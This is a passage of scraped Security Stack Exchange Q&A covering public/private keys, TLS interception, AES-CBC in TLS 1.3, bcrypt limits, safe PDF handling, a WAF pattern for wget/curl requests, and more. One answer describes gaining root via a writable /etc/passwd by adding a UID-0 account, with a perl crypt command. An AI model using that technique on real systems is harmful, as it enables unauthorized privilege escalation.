C4 5F 60 47 CE 81 80 83 57 6A 6C 31 29 EA C8 8A
CB C8 8C 3F 50 51 F0 06 F2 D2 24 18 60 87 7D AB
B0 6F 81 F6 3E B7 F1 F3 6F ED 67 73 41 EA FF 83
61 CA C3 2C A6 44 F2 58 21 6C C9 DD EC 95 85 7C
B2 AD E4 35 E2 9B 9F 82 0C 7A AB 58 18 0E 54 97
Public Exponent (24 bits):
01 00 01 Further examples of this can be found on github.com where they request that you attach a public key to your account for use with git clone [email protected]:<user>/<repo> You can actually check the public keys of any user on github with the following URL https://api.github.com/users/<user>/keys mine is listed as: [
{
"id": 18667533,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDraswAp7EbMwyYTzOwnSrsmr3nNMDaDf4e2YVaehLc9w6KN2ommomXZO8/V9N3yINNveGqrcVc9m2NTm04iILJUKd9o25ns8QIG6XSCt9SVx/Xw1J/SXfIWUKuEe0SgmIwVwkk8jetfG/Z7giSiU3dxxC4V9lHQCFgKOKBWGpNbINmqtmBWncX3HJKeXrpSddoePbZZ84IEFr4CWUlqoXyphpxqzpfA9sRpVTtyBPcUSj68j4+gKgEQN65G6LXys3q8BiwWxucci6s34vp4L8jKn7uYh26vLuT1oIbODJphCmpvMH+ABPkNQcFBk4rRLpCEAsoAhmvTk/NjnfZM+nd"
},
{
"id": 21175800,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5tPV481acCZ5wm2E15gXkVRaKCE3lic/O8licyzW+eDE9rPpG4rHRRH9K2ENmstUh5nLEenb0nNhEGnsf3pIJRZ07JXwv16+lsJBSS8+YiWeMBlwo+JNaxwSyUlYUgl1ruogr0nR0KBqsYSWXuG0s2jm2IOV+0B/0fzDR/tiLFLj50+iJ9qCDSk/8fAsXz2xG39KcUcxmCbDXb/qSdESWaZc+pafNRiCcVNfMkKeDViWlzI4VkiTcfVCraHUuYx4jgOBB526dRWSDG9bLchwlJiopgT+k4X/TNe2l01DPwYetwLvY6V8rcPrjjJL8ifRTMSof1zRIoBgJZhRzWc1D"
}
] The exact opposite is true of Private Keys which should be secured at all times and never given to a third party or exchanged via email without encrypting them. If someone has accessed your private key, they have the ability to access any device or encrypted file that was protected with your public key. It also means that they can sign things on your behalf. It is VERY bad if someone has gained access to your private key. In many cases SSH Clients will not function if it is detected that the permissions of the Private key file are such that users other than you have read access. | {
"source": [
"https://security.stackexchange.com/questions/150549",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91316/"
]
} |
150,555 | My questions refer detecting fake User-Agent, in sense of spoofing user OS, web-browser and other info sent in headers from users browsing resources on my server. Is there a way to detect if user is using some tools to fake his fingerprint, e.g. by setting a fake User-Agent? Is it possible to detect if a user changes it's headers by browser developer tools or some other more sophisticated anonymization software? | Public Keys are designed for sharing, read access to and or publishing a public key is fine Private Keys are secret, they should only be accessible to the owner of said private key. To drive this point home, think back to every HTTPS website you have ever visited. In each case, as part of HTTPS the site gives you their public key. So not only is it safe to publish it, it is intended to be this way. For example, if you click on the green lock icon on your address bar, you can find the public key for this website (if you are viewing it on HTTPS) *.stackexchange.com
Modulus (2048 bits):
BD 15 6A 1B 0A 03 69 CC 00 99 A0 4E 9E 31 99 34
3F 32 B8 6B 7C 62 0A 4D DC 45 41 72 8A 3E 92 DA
B3 64 45 B2 31 59 DE 71 60 D3 E3 26 91 DE 55 0D
3C F1 8C E2 C3 4C 01 F1 39 B4 A1 45 D5 9A 77 05
FC 2D 92 C6 B9 CE 10 4D DB 6F 7B 72 44 C0 18 38
4E B3 5E 3B 59 74 5C 52 E1 E7 3F E9 1C B8 23 F5
94 99 BE E7 BC 19 AA DE C0 6A C4 5E 4C 83 2D 5E
3B 1F 7F 97 56 42 28 C9 9E E4 D7 E8 45 E2 E1 D5
D5 E3 FD 73 01 D5 59 49 7C 97 82 F4 F3 AC 09 5B
4D 88 A1 F0 A3 7F 9A D6 2E E1 32 78 5C 0E F8 7D
74 E5 1C E8 C5 62 5A 78 AF 3C C4 51 75 FA F8 41
C4 5F 60 47 CE 81 80 83 57 6A 6C 31 29 EA C8 8A
CB C8 8C 3F 50 51 F0 06 F2 D2 24 18 60 87 7D AB
B0 6F 81 F6 3E B7 F1 F3 6F ED 67 73 41 EA FF 83
61 CA C3 2C A6 44 F2 58 21 6C C9 DD EC 95 85 7C
B2 AD E4 35 E2 9B 9F 82 0C 7A AB 58 18 0E 54 97
Public Exponent (24 bits):
01 00 01 Further examples of this can be found on github.com where they request that you attach a public key to your account for use with git clone [email protected]:<user>/<repo> You can actually check the public keys of any user on github with the following URL https://api.github.com/users/<user>/keys mine is listed as: [
{
"id": 18667533,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDraswAp7EbMwyYTzOwnSrsmr3nNMDaDf4e2YVaehLc9w6KN2ommomXZO8/V9N3yINNveGqrcVc9m2NTm04iILJUKd9o25ns8QIG6XSCt9SVx/Xw1J/SXfIWUKuEe0SgmIwVwkk8jetfG/Z7giSiU3dxxC4V9lHQCFgKOKBWGpNbINmqtmBWncX3HJKeXrpSddoePbZZ84IEFr4CWUlqoXyphpxqzpfA9sRpVTtyBPcUSj68j4+gKgEQN65G6LXys3q8BiwWxucci6s34vp4L8jKn7uYh26vLuT1oIbODJphCmpvMH+ABPkNQcFBk4rRLpCEAsoAhmvTk/NjnfZM+nd"
},
{
"id": 21175800,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5tPV481acCZ5wm2E15gXkVRaKCE3lic/O8licyzW+eDE9rPpG4rHRRH9K2ENmstUh5nLEenb0nNhEGnsf3pIJRZ07JXwv16+lsJBSS8+YiWeMBlwo+JNaxwSyUlYUgl1ruogr0nR0KBqsYSWXuG0s2jm2IOV+0B/0fzDR/tiLFLj50+iJ9qCDSk/8fAsXz2xG39KcUcxmCbDXb/qSdESWaZc+pafNRiCcVNfMkKeDViWlzI4VkiTcfVCraHUuYx4jgOBB526dRWSDG9bLchwlJiopgT+k4X/TNe2l01DPwYetwLvY6V8rcPrjjJL8ifRTMSof1zRIoBgJZhRzWc1D"
}
] The exact opposite is true of Private Keys which should be secured at all times and never given to a third party or exchanged via email without encrypting them. If someone has accessed your private key, they have the ability to access any device or encrypted file that was protected with your public key. It also means that they can sign things on your behalf. It is VERY bad if someone has gained access to your private key. In many cases SSH Clients will not function if it is detected that the permissions of the Private key file are such that users other than you have read access. | {
"source": [
"https://security.stackexchange.com/questions/150555",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62048/"
]
} |
150,740 | I was watching this video about TLS 1.3: " Deploying TLS 1.3: the great, the good and the bad (33c3) " and was somewhat surprised to see that in their effort to provide "fewer, better choices" they dropped AES-CBC as a supported block cipher mode. The video lists a number of attacks (Lucky13, POODLE and others), that to my untrained eye seem to be implementation issues. I understand that it is better to have a mode that doesn't encourage such implementation issues, but was that all it took to deprecate this entire cipher mode? While this book is somewhat dated (2010), Cryptography Engineering it recommends AES-CBC using a randomly generated IV as the best option. | The problem here is not so much with CBC, but with alternatives that are easier to implement safely, without losing mathematical security.In fact, AES-CBC turned out to be notoriously difficult to implement correctly. I recall that older implementations of transport layer security don't have cryptographically secure initialization vectors, which are a must-have for CBC mode A lot of recent attacks are padding oracle attacks, like the Bleichenbacher attack . These especially depend on old modes kept for support. POODLE is a downgrade vulnerability. LOGJAM is downgrading TLS to old, export-grade (read NSA-sabotaged) crypto suites. For CBC mode, there is the Vaudenay attack.
These attacks depend on the server explicitly saying "invalid padding", thereby leaking 1 bit of information on each transaction. Error messages were removed, but the problem of timing remained. The server still used more time before responding if the padding was valid. In response they were forced to come up with the peculiar workaround of generating a dummy key, and using that for decryption so it would fail in another part of the implementation. In every implementation. So they decided to no longer force that on developers by supporting it in the specs. Cryptography is a very broad field, and a specialty on its own. History had learned through uncomfortable experience, that doing it perfectly is almost never guaranteed, even for the best in the field. For example MD5, created by Ron Rivest, co-inventor (and part-namesake) of RSA was widely used, then broken in 2013 . Its collision resistance was circumvented in 2^18 time, less than a second on a desktop computer for 128 bit hashes. | {
"source": [
"https://security.stackexchange.com/questions/150740",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138779/"
]
} |
150,758 | I'm writing a simple REST API, and I want to restrict access to my mobile-client only. In other words, I'm trying to prevent a malicious user from e.g. using curl to make an unauthorized POST request. Of course, this is impossible. However, there are certain countermeasures that make it difficult for a hacker to succeed. Right now, I am encrypting all requests with a private key, stored client-side (obviously, this is not ideal, but the difficulty in reverse-engineering an iOS app will hopefully deter all but the most determined hackers). One simple idea I had is to return the wrong HTTP response code for an unauthorized request. Rather than return a "401 Unauthorized," why not return e.g. "305 Use Proxy," i.e. purposely being confusing. Has anyone ever thought about doing this? | Has anyone ever thought about doing this? Yes, there was actually a talk about exactly this at defcon 21 ( video , slides ). Their conclusion was that working with response codes as offensive security can sometimes result in severely slowing down automatic scanners, non-working scanners, and a massive amount of false-positives or false-negatives (it will obviously do little to nothing for manual scans). While security by obscurity should never be your only defense, it can be beneficial as defense in depth (another example: it is recommended to not broadcast version numbers of all used components). On the other hand, a REST API should be as clean as possible, and replying with purposely wrong HTTP codes may be confusing for developers and legitimate clients (this is a bit less of a problem for browsers, where users don't actually see the codes). Because of this I wouldn't recommend it in your case, but it is still an interesting idea. | {
"source": [
"https://security.stackexchange.com/questions/150758",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138794/"
]
} |
151,165 | We should all know the XKCD comic on password strength , suggesting (appropriately) that a password based on multiple common words is more secure and memorable than a password such as Aw3s0m3s4u(3 or something. I have an application (multi-platform) that I want to generate somewhat secure passwords for, and my password requirements are much less demanding: if the password has no spaces I expect the 'multiple symbols, numbers, mixed alpha and 6+ characters', but if the password has more than one nonconsecutive space I'm relaxing the symbol/number/mixed case constraint, and instead require at least two words that are no less than 4 characters individually, with a minimum password length of 15 characters. The question isn't about that aspect, but about generating: assuming I want to generate an easy-to-remember and hard-to-guess password for the user, is it cryptographically safe to generate a password based on 5 or so dictionary words from a 10k word list? (Literally 10k words sit in my database, scraped from various sources, emails, etc.) They're all pretty common words, no less than 3 characters in length. Now I don't want to make these one-time passwords, but I'm suspecting I should at least require the user to change it to something else upon logging in after using this generated password, which is fine and I can , but I also want users to have the option (on changing a password) to generate a 'secure' password that fits my requirements. From a cracking standpoint, how easy/difficult would it be to attack a password generated using this scheme? There's no fixed length, words in this database table range in length from 3 characters to 11 characters ( environment is a word in the database, for example)? The programme generating the passwords will not pick two words with 4 or fewer characters (so the shortest password could be one three-character word, 4 five-character words, and 4 spaces, for a total of 27 characters), and it will not use the same term twice in a password. Based on samples I've run against it, the average password length generated by the programme is ~34 characters, which seems acceptable to me. Even if we assume that each of the 27 minimum non-space characters (so 23 characters in the end) can be 26 possible states ( a-z ), that's 23^26 or 2.54e+35 possibilities. There are 994 words in the database with 3 to 4 characters in length. We can also assume that the attacker has the dictionary, and the generation parameters/algorithm. Is this still secure, can I get away with taking one word away from the generated password (that's still 21 characters, for 18^26 possibilities ( 4.33e+32 ) based on entropy alone), the only problem I see is that this isn't based on character entropy, but on word entropy, which would mean the 5-word password is 10000*9006*9005*9004*9003 possibilities, or 6.5e+19 possibilities, and the 4-word password is 10000*9006*9005*9004 possibilities, or 7.30e+15 . Compared to a normal 6-character password ( (26+26+10+33)^6 or 7.35e+11 possibilities: 26 lower alpha, 26 upper alpha, 10 numbers, 33 symbols) it's significantly stronger. Another assumption I made: users will write this down, they always do. I suspect that five random words on a piece of paper (hopefully not in direct sight, but alas that's the most likely scenario) are less-likely to be picked up as a potential password than a, well, complex term that looks like a traditional password. Lastly, before I get to my actual questions, the passwords are all salted before stored in the database, then hashed with the SHA-512 algorithm 100 times, with the salt being appended between each hash. If the user logs in successfully then the salt is changed and a new password hash is created. (I assume this doesn't help much in a brute-force offline attack, but it should help against active online attacks I would think.) DatabasePassword = SHA512(...SHA512(SHA512(SHA512(password + salt) + salt) + salt) + salt)...) So, finally, my actual questions: Is my math correct? (You don't necessarily have to answer this, I'm sure it's close enough in principle to demonstrate my concerns.) Is this generation secure or should I stick to the 'traditional' password generation? Do note that an attacker doesn't have any idea on whether the users' password was generated with this algorithm or selected by the user, the attacker can make an assumption if they know the length, but that may or may not be a safe one. Lastly, did I make any assumptions that would significantly alter (increase or decrease) the security of this 'idea'? (By assuming the per-character entropy of a 6-character password is 95, for example.) Apologies for the length, I'm used to over-explaining myself to hopefully alleviate confusion. It was pointed out that my question is extremely similar to this one , I want to point out the differences in my generation method (though, honestly, it's still similar enough that it could be considered a duplicate, I leave that up to the community to decide): Each word is separated by a space, this means that all but the first and last three characters have an additional potential state. The password is not selected by a human, it's (mostly) uniform-random generation. No words are preferred over others except to only allow one ultra-short (3 or 4 character) word, once the random generator selects a word of that length no more of those may be selected. (Though the position that word will be in the list of words is random still, and there may not be an ultra-short word selected.) This is mixed in with a separate password restriction, which means the attacker has two vectors to attempt to crack. The user could have selected a password meeting the 'traditional' requirements or a password meeting the 'XKCD' requirements. | First, there is no such concept as a cryptographically secure password. The aim of a password is to be hard to guess for an attacker and how hard it should be to guess depends on how the password is used: if the account is locked after three failed attempts the password can be more weak compared to when an attacker can try an unlimited number of passwords or when the attacker has access to the hashed passwords. In your case you create a password from randomly choosing 5 words from a set of 10k words. Assuming that the attacker knows your dictionary (not unlikely because your requirement is easy to remember words) and the way the password is constructed from the dictionary this means that there are (10^4)^5 = 10^20 variants. This is similar to guessing 20 digits or a password with 12..13 random alpha-numeric mixed-case characters. Such passwords are usually considered secure enough for most purposes. As for the storage of the password: don't invent your own method but use methods proven to be good. For details see How to securely hash passwords? In the current form I would consider the chosen method weak because you are using only 100 iterations with a hash function which is designed to be fast. Just for comparison: PBKDF2 recommended at least 1000 iterations in 2000 already and LastPass used 100.000 iterations for server side hashing in 2011. Fortunately you kind of make up for the weaker password storage by having more complex passwords. | {
"source": [
"https://security.stackexchange.com/questions/151165",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/130608/"
]
} |
151,297 | I would like to allow users of my web application to have long passwords, if they so wish. Today I became aware of bcrypt's password length limitation (72 characters, the rest truncated). Would it be secure for me to do the following? I am using PHP. Current Implementation: password_hash($password, PASSWORD_BCRYPT, $options); Implementation in question: password_hash(hash('sha256', $password), PASSWORD_BCRYPT, $option); What are the drawbacks of the implementation in question? I am not a crypto expert, please advise. Will the implementation in question limit the password length that a user can use? If so, what will the limit be? | In general, this will be fine. It's even a fairly well recommended method to allow arbitrary length passwords in bcrypt. Mathematically, you are now using bcrypt on a 64 character string, where there are 2^256 possible values (SHA-256 gives 256 bit output, which is commonly represented as a 64 character hexadecimal string). Even if someone pre-calculated common passwords in SHA-256, they'd need to run those through bcrypt to find what the actual input for a given hash was. The main potential drawback is implementation flaws: if you ever store the SHA-256 values, they're relatively fast to break, so an attacker wouldn't need to expend the effort to break the bcrypt values. It would still be recommended to keep a high enough iteration count for the bcrypt step - this shouldn't have any particularly detrimental effect on your processing time, but makes brute force attacks much harder. See Pre-hash password before applying bcrypt to avoid restricting password length for the general case. | {
"source": [
"https://security.stackexchange.com/questions/151297",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92420/"
]
} |
151,300 | As an investigative journalist I receive each day dozens of messages, many of which contain PDF documents. But I'm worried about some of the potentially malicious consequences of blindly opening them and getting my computer compromised. In the past, before I started working in investigative journalism, I was using virustotal.com to analyze all files (including PDFs) coming to my inbox, but that's not possible in this case as the files will be sent to them when they're meant to be confidential before release. And I heard that antivirus solutions are not 100% foolproof. What is the safest way to deal with loads of incoming PDF files, some of which could potentially be malicious? | I think the safest option for you would be to use Qubes OS with its built in DisposableVM s functionality, and its “ Convert to Trusted PDF ” tool. What is Qubes OS? Qubes is an operating system where it's all based on virtual machines. You can think of it as if you had different isolated ‘computers’ inside yours. So that way you can compartmentalize your digital life into different domains, so that you can have a ‘computer’ where you only do work related stuff, another ‘computer’ that is offline and where you store your password database and your PGP keys, and another ‘computer’ that is specifically dedicated for untrusted browsing... The possibilities are countless, and the only limit is your RAM and basically how much different ‘computers’ can be loaded at once. To insure that all these ‘computers’ are properly isolated from each other, and that they can't break to your host (called ‘ dom0 ’ for domain 0) and thereby control all of your machine, Qubes uses the Xen hypervisor , [1] which is the same piece of software that is relied upon by many major hosting providers to isolate websites and services from each other such as Amazon EC2, IBM, Linode...
Another cool thing is that each one of your ‘computers’ has a special color that is reflected in the windows' borders. So you can choose red for the untrusted ‘computer’, and blue for your work ‘computer’ (see for example picture below). Thus in practice it becomes really easy to see which domain you're working at. So let's say now that some nasty malware gets into your untrusted virtual machine, then it can't break and infect other virtual machines that may contain sensitive information unless it has an exploit that can use a vulnerability in Xen to break into dom0 (which is very rare), something that significantly raises the bar of security (before one would only need to deploy malware to your machine before controlling everything), and it will protect you from most attackers except the most resourced and sophisticated ones. What are DisposableVMs? The other answer mentioned that you can use a burner laptop. A Disposable Virtual Machine is kind of the same except that you're not bound by physical constraints: you have infinitely many disposable VMs at your wish. All it takes to create one is a click, and after you're done the virtual machine is destroyed. Pretty cool, huh? Qubes comes with a Thunderbird extension that lets you open file attachments in DisposableVMs, so that can be pretty useful for your needs. [2] (Credits: Micah Lee ) What's that “ Convert to Trusted PDF ” you were talking about? Let's say you found an interesting document, and let's say that you had an offline virtual machine specifically dedicated for storing and opening documents. Of course, you can directly send that document to that VM, but there could still be a chance that this document is malicious and may try for instance to delete all of your files (a behavior that you wouldn't notice in the short-lived DisposableVM). But you can also convert it into what's called a ‘Trusted PDF’. You send the file to a different VM, then you open the file manager, navigate to the directory of the file, right-click and choose “Convert to Trusted PDF”, and then send the file back to the VM where you collect your documents. But what does it exactly do? The “Convert to Trusted PDF” tool creates a new DisposableVM, puts the file there, and then transform it via a parser (that runs in the DisposableVM) that basically takes the RGB value of each pixel and leaves anything else. It's a bit like opening the PDF in an isolated environment and then ‘screenshoting it’ if you will. The file obviously gets much bigger, if I recall it transformed when I tested a 10Mb PDF into a 400Mb one. You can get much more details on that in this blogpost by security researcher and Qubes OS creator Joanna Rutkowska. [1] : The Qubes OS team are working on making it possible to support other hypervisors (such as KVM) so that you can not only choose different systems to run on your VMs, but also the very hypervisor that runs these virtual machines. [2] : You also additionaly need to configure an option so that the DisposableVM-that is generated once you click on “Open in DispVM”-will be offline, so that they can't get your IP address. To do that: "By default, if a DisposableVM is created (by Open in DispVM or Run in DispVM ) from within a VM that is not connected to the Tor gateway, the new DisposableVM may route its traffic over clearnet. This is because DisposableVMs inherit their NetVMs from the calling VM (or the calling VM's dispvm_netvm setting if different). The dispvm_netvm setting can be configured per VM by: dom0 → Qubes VM Manager → VM Settings → Advanced → NetVM for DispVM ." You'll need to set it to none so that it isn't connected to any network VM and wont have any Internet access. [3] : Edit: This answer mentions Subgraph OS, hopefully when a Subgraph template VM is created for Qubes you could use it with Qubes, making thus exploits much harder, and thanks to the integrated sandbox it would require another sandbox escape exploit as well as a Xen exploit to compromise your entire machine. | {
"source": [
"https://security.stackexchange.com/questions/151300",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/139322/"
]
} |
151,362 | I just accidentally copypasted a wget command into the ebay search box and got the following error: It happens with wget http://google.com or curl http://google.com , or any other URL... It does seem to sanitise the input and remove slashes if you just enter a URL but not if you precede it with wget or curl. What could they possibly be doing which causes a wget or curl command to bypass their sanitization and produce a different result? | I assume that ebay.com installed a Web Application Firewall, which recognizes your request as a possible attack. Therefore, your request is cancelled and you receive a HTTP 403 - Access Denied . The mod_security WAF for Apache, nginx and IIS behaves similar: If it is in prevention mode, it will also respond with HTTP 403 by default [1]. Most WAFs have some kind of a rule set. They check whether your request matches one of their rules, maybe with regular expressions. I assume further that one of those rules looks like (wget|curl) (http|https)://.* [2]. The "sanitizing" of double forward slashes in your url happens most likely on the application level. Strings like asdf// will also be shortened to asdf . [1] https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#secdefaultaction [2] Skipped escaping of forward slashes for the sake of readability | {
"source": [
"https://security.stackexchange.com/questions/151362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/139411/"
]
} |
151,700 | If I have a world writeable /etc/passwd file on a system, how can I escalate my privileges to root? I am currently a underprivileged user. The underlying OS is CentOS 7.2 in case you are wondering I know that passwd file is not normally world writeable, I am doing a challenge that has the current scenario. Any steps to exploitation will be greatly helpful | Passwords are normally stored in /etc/shadow , which is not readable by users. However, historically, they were stored in the world-readable file /etc/passwd along with all account information. For backward compatibility, if a password hash is present in the second column in /etc/passwd , it takes precedence over the one in /etc/shadow . Historically, an empty second field in /etc/passwd means that the account has no password, i.e. anybody can log in without a password (used for guest accounts). This is sometimes disabled. If passwordless accounts are disabled, you can put the hash of a password of your choice. You can use the crypt function to generate password hashes, for example perl -le 'print crypt("foo", "aa")' to set the password to foo . It's possible to gain root access even if you can only append to /etc/passwd and not overwrite the contents. That's because it's possible to have multiple entries for the same user, as long as they have different names — users are identified by their ID, not by their name, and the defining feature of the root account is not its name but the fact that it has user ID 0. So you can create an alternate root account by appending a line that declares an account with another name, a password of your choice and user ID 0. | {
"source": [
"https://security.stackexchange.com/questions/151700",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105654/"
]
} |
151,754 | Assumptions: Normal LAMP Web-server running web app. (Eg. AWS EC2+Apache2+MySQL+Php7) Not directly targeted by some super-hacker or governmental organisation etc. Related to point above, no social engineering and the web app itself is secure. Targeted by whom? Automated scans and exploits. Are there others? Is running apt-get update && apt-get upgrade every so often enough to keep a web-server secure? If no What else should the 'average' web app programmer, who is also taking care of the server, do to keep the web server reasonably secure for a startup company. It depends... Yes, it always depends on many things. Please include assumptions for the most common cases (pareto principle) that the common web app programmer may or may not be aware of. | You've removed a lot of problems that normally get you in trouble (namely, assuming that the app you're hosting is completely secure). From a practical perspective, you absolutely have to consider those. But presumably since you're aware of them, you have some protective measures in place. Let's talk about the rest, then. As a start, you probably shouldn't run an update "every so often". Most distros operate security announcement mailing lists, and as soon as a vulnerability is announced there, it's rather public (well, it often is before that, but in your situation you can't really monitor all the security lists in the world). These are low-traffic lists, so you should really subscribe to your distro's and upgrade when you get notifications from it. Often, a casually-maintained server can be brute-forced or dictionary attacked over a long period of time, since the maintainer isn't really looking for the signs. It's a good idea then to apply the usual counter-measures - no ssh password authentication, fail2ban on ssh and apache - and ideally to set up monitoring alerts when suspicious activity occurs. If that's out of your maintenance (time) budget, make a habit of logging in regularly to check those things manually. While not traditionally thought of as a part of security, you want to make sure you can bring up a new server quickly. This means server configuration scripts (tools like Ansible, Chef, etc. are useful in system administration anyways) and an automatic backup system that you've tested. If your server's been breached, you've got to assume it's compromised forever and just wipe it, and that sucks if you haven't been taking regular backups of your data. | {
"source": [
"https://security.stackexchange.com/questions/151754",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94032/"
]
} |
151,866 | I have viewed Gmail's certificate chain at my workplace, and I realised it's different. It looks like this: Root CA
Operative CA1
___________.net
mail.google.com When I get the certificate chain at home, it looks like this: GeoTrust Global CA
Google Internet Authority G2
*.google.com Obviously these certificates are issued by my company. I recently read some other thread on security.stackexchange, and they said the company is eavesdropping (using an MITM proxy) the HTTPS communications to protect the internal network and the client machine against viruses. That means they can read my all of the encrypted package that has been sent via HTTPS, including this message too. If this is true, can I work around this? Or please correct me if I'm wrong. | Yes, a company doing SSL interception could in theory read all your traffic if you use the company network. Depending on where you live and what kind of contract you have the ability for the company to do this might also be somehow part of the contract or working rules which might also include that you are only allowed to use the company network for work related stuff. can I workaround this? Yes, you might use a different machine and network like your mobile phone for your private, not work related, traffic. Depending on the configuration of the firewall it might also be possible to use some VPN tunnel through the firewall. But it is usually explicitly forbidden to do this so you risk to get fired for this. | {
"source": [
"https://security.stackexchange.com/questions/151866",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70916/"
]
} |
152,066 | If someone has the key and a valid referer, they can use the API key from any client as long as the set referer header, correct? So is it worthwhile to use this restriction? | All security measures are trade offs. Is the cost of the control worth more or less than the value of what is being protected, and how much more work does it force the attacker to do. A lock on your luggage may stop a casual thief from opening your bag to grab something, but it won't stop someone stealing your bag. But the cost is low, so it is a still a useful security control. So, just because a malicious agent could copy the referrer header, they may not have the time or inclination to do so. Think of a valid referrer header like a concert wristband. Can you forge them, or sneak around the guard checking wristbands? Sure you can, but it doesn't make the band useless. It raises the cost for the attacker. Likewise, your standard, non-modified, well-behaved application will tell the truth about the last page it came from, and then will correctly be denied API access. Maybe somebody trying to abuse your service doesn't know you are checking referrer headers on the server, and will give up. So, in answer to OP's question "worthwhile" is a value judgement only you can make. How much effort does it take you to check referrer? Probably not much. How valuable is protecting use of your API key? Probably more. Is that amount of effort on your part worth the speedbump you'll place in the attacker's way? That last one is your call. | {
"source": [
"https://security.stackexchange.com/questions/152066",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140157/"
]
} |
152,128 | More and more web sites use for an authentication some digits keyboards with random position instead of password. Like this Could someone explain me the idea of this instead usual login and password? I have an idea that it seems to be more secure because if you capture traffic of someone you'll get only coordinates clicked and these coordinates are different every time. But in this case server should transfer the positions of each button to a client to make last be able to display it correctly (4 is top left corner, 8 in bottom left, etc) If the traffic can be captured so we can capture the position of each digit and coordinates clicked after. Why is it more stable that common login / password with htts enscrition? | Using a randomized software keyboard for password input is based on the misconception that it can prevent key loggers. It can somewhat effectively prevent hardware key logger from capturing the login data. In a weak sense, it also prevents some naive software key loggers from capturing login data, however as you correctly mentioned, a slightly better keylogger can trivially take screencaps as well to defeat this measure, and a more sophisticated one can just install a browser add-on to capture the password before it's sent to the server. Since hardware key logger is much rarer compared to software key loggers, in most sites where such randomized software keyboard is implemented, it is really only a sign of the developer being clueless that such measures are ineffective against most keyloggers. | {
"source": [
"https://security.stackexchange.com/questions/152128",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140184/"
]
} |
152,252 | Yesterday evening my android phone (Google Play Services app) asked me to log in again into my account due to "security changes" (I don't remember the exact wording used). I double checked it was the real app and logged in again (I went through all the authentication steps, including 2FA through SMS that was automatically picked up by the app). I then checked all my account activities and security settings, and found there were no signs of access or edits other than my own. Everything looked perfectly fine, including linked devices and apps. Should I worry, or is this a random check by Google to see if my access from the phone is still valid? (Or maybe Google Play Services just lost an auth token and asked me to log in again?) Example of sign-in request: | Google says it's not a security problem and that you don't have to worry. After investigation they issued a statement in the Google product forums : What happened? During routine maintenance [from 1pm to midnight PST yesterday], a number of users were signed-out from their Google accounts. This may have resulted in you being signed out of your account or seeing a notification about “A change in your Google account” or “Account Action Required.” We hear your concerns that this appeared to potentially be phishing or another type of security issue. We can assure you that the security of your account was never in danger as a result of this issue. You can always learn more about the Security tools Google provides at www.google.com/safetycenter/ What should I do now? First, try signing back in with your usual username and password at accounts.google.com . If you can’t remember your password or can’t sign in for another reason, recover your account here: g.co/recover . Note that the statement only refers to this particular incident from around February 24th, 2017 which has affected many users and is likely harmless. But more generally, if Google is asking for a security confirmation or warning you about changed account details, you should take that seriously and review your security settings and recent logins - as you should do regularly anyways. | {
"source": [
"https://security.stackexchange.com/questions/152252",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/80617/"
]
} |
152,430 | When I generated password for GitHub with KeePass I got a message on GitHub site that said the limit for password length is 72 characters. It seemed weird it not being a power of 2 so I googled a bit and it appeared that 72 is the max bytes for brypt algorithm. So it seems logical to restrict the number to 72 as longer passwords would be truncated to 72 anyway. Then I generated password for Discord and it appeared that the max length is 128 characters. But I thought that I'll check if the first 72 characters from my password would suffice. And yes, my 128 character password is also truncated to 72 first ones, so I guess Discord is also using bcrypt. So the question is, is it better to just set the password length limit to 72 characters or let users choose longer passwords (how long? 128, 256 bytes?) even though they will be truncated? The first criterion is security and only then usability, storage or difficulty of implementation. | I don't favor silent truncation because it misleads the users into thinking that their entire password was accepted when it wasn't. I'd prefer a system just set a maximum length, if necessary, and restrict the user to that during password input. One bad scenario I've heard of is a code change that begins processing characters beyond the previous max length and suddenly the longer password users can't log in. The system only has a record of the first 72 characters and their longer string doesn't match that without the old system truncation. That leads to frustrated users. As an alternative to truncation at 72 characters you should consider pre-hashing the password with something like salted SHA-256. The allows the user's entire password string beyond 72 characters to be considered while still providing the computational protection of bcrypt. Please read the linked question and comments below to understand some of the security tradeoffs of this approach. | {
"source": [
"https://security.stackexchange.com/questions/152430",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/111371/"
]
} |
152,594 | During SSHv2 connection initialization, there is a following debug message: debug1: Offering RSA public key: /home/user/.ssh/id_rsa Am I correct that actually no public key is sent to server? In addition, /home/user/.ssh/id_rsa is my private key. What exactly does this Offering RSA public key message mean? | When the SSH client displays this message, it's trying to authenticate the user on the server ( userauth_pubkey in sshconnect2.c ). The client needs to demonstrate that it has the private key corresponding to a public key that is authorized on the server. The file name displayed in the debug message is the name of the private key file (e.g. passed as an argument to -i or as the IdentityFile configuration directive). At the point where this message is displayed, the client doesn't use the private key, only the public key. However, the client wants to know that the private key is available, because if the server agrees to use this public key then the client will have to demonstrate that it knows the private key. The client sends an SSH_MSG_USERAUTH_REQUEST message to the server with the publickey method containing the public key. If the server agrees to use this public key (“debug1: Server accepts key”) then the client will later use the private key to sign a challenge sent by the server in another SSH_MSG_USERAUTH_REQUEST message (in sign_and_send_pubkey — the have_sig byte changes from 0 (“tell me if you like this key”) to 1 (“here's a proof that I'm me, let me in”)). | {
"source": [
"https://security.stackexchange.com/questions/152594",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29200/"
]
} |
